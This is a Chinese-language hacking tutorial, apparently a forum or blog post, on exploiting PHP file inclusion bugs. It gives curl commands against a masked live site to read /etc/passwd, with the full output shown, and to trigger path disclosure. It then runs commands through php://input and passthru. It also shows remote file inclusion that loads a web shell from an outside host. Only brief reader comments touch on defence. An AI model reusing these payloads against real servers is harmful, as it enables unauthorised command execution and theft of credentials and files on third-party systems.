对PHP文件包含漏洞的初步认识
作者: 疯狗
经常听到PHP文件包含漏洞,前一阵子贱心发现的BO-BLOG漏洞就是文件包含漏洞,可以用来执行一些命令,这个文件包含到底是怎样形成鸟?
可以简单的理解为乱用include();
$id=$_GET["id"];
include($id);
稀里糊涂的就把$id这个变量给引用了,但是不要单纯的理解为这个漏洞就是include了变量,include了文件也是有可能利用的,这个稍后在做介绍.
首先做个简单的测试,让大家初步了解下文件包含BUG(提交数据,我爱curl),首先把以上文件保存在肉鸡上,我命名为1.php
然后提交我们构造的$id变量内容,/etc/passwd,提交,看返回结果
C:>F:Hacker综合工具curlcurl.exe http://www.***.net/admin/1.php -d "id=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sheke:x:500:500::/usr/:/bin/bash
mysql:x:501:501::/home/mysql:/bin/bash
my89189-com:x:502:503::/home/web/my89189-com/:/sbin/nologin
sk:x:503:504::/home/sk:/bin/bash
cyol-com:x:504:505::/home/web/cyol-com/:/bin/bash
ianlow-com:x:505:506::/home/web/ianlow-com/:/bin/bash
rich30:x:506:507::/home/web/rich30:/bin/bash
sanyc:x:507:508::/home/web/sanyc/:/bin/bash
toipo-com:x:508:509::/home/web/toipo-com/:/bin/bash
my89189-com-minglu:x:509:510::/home/web/my89189-com/minglu/:/bin/bash
dong:x:510:511::/home/web/my89189-com/minglu/dong/:/bin/bash
jeslea-com:x:511:512::/home/web/jeslea-com:/bin/bash
C:>
读出文件了哦,注意权限,如果我提交一个不存在的变量是什么效果呢?
C:\>F:\Hacker\综合工具\curl\curl.exe http://www.***.net/admin/1.php -d "id
=fuck"
Warning: main(fuck): failed to open stream: No such file or directory in
/home/web/sa***/admin/1.php on line 2
Warning: main(fuck): failed to open stream: No such file or directory in
/home/web/sa***/admin/1.php on line 2
Warning: main(): Failed opening 'fuck' for inclusion (include_path='.:/u
sr/local/php/lib/php') in /home/web/sa***/admin/1.php on line 2
/>
C:\>
爆出了绝对路径,MLAND有事,就先写到这.
光是这样来读取文件觉得还不够,是否可以执行命令呢?有种方法是把< ?passthru($cmd);?>写进apache的日志文件,但是成功率不高,在网上找到一种方法,利用php://input
URL:http://www.itvisual.org/linux/18/112408.html
来提交
C:\>F:\Hacker\综合工具\curl\curl.exe http://www.***.net/admin/1.php -d "id
=php://input&< ?passthru('id');?>"
id=php://input&uid=99(nobody) gid=4294967295 groups=4294967295
呵呵,成功了,试试列目录,替换W为ls即可,文件包含漏洞配合这个php://input简直了,而且它默认还是开放的,好了下面试试非变量包含漏洞,即"文件"包含漏洞是怎样的呢?
例如2.php是这样的
< ?
...
include("$inc/conn.php")
...
?>
虽然$inc我们可以自己来定义,但是后面还有个conn.php,难道这样就不行了吗?首先我们可以定义$inc,还有呢,别忘了这是include啊!我们完全可以利用第三人来配合攻击.也许有的人糊涂了,或者是思路被限制了,认为$inc只能提交些命令,其实我们完全可以把它伪装成另一个站点,那么调用的就是另一个站点的conn.php了,而这个conn.php呢,内容就是这个
< ?passthru($cmd);?>
然后在提交$cmd变量的内容为我们需要的命令,貌似很烦琐啊,看这个例子大家就明白了
C:\>F:\Hacker\综合工具\curl\curl.exe http://www.***.net/admin/2.php -d "in
c=http://www.loveshell.net&cmd=id"
uid=99(nobody) gid=4294967295 groups=4294967295
看到了吗?其实引用的内容变成include("http://www.loveshell.net/conn.php")了,紧接着$cmd变量跟入执行命令.
由此可见,这钟漏洞危害很大啊,ls出数据库连接文件,在cat,结果可想而知,而且现在不知道还有多少程序存在隐藏的文件包含BUG,当然了,现在大的程序的include()绝不会这么弱智的,一定会有对变量处理的地方,但是也会有疏漏的,好自为之了.
姓名:Chinadu
intval($_GET['id']);
addslashes($_GET['$char']);
其實只要杜絕所有外來變量或對外來變量過濾處理就基本可以了
不懂,难死了``闷```
慢慢的就看的懂了...HOHO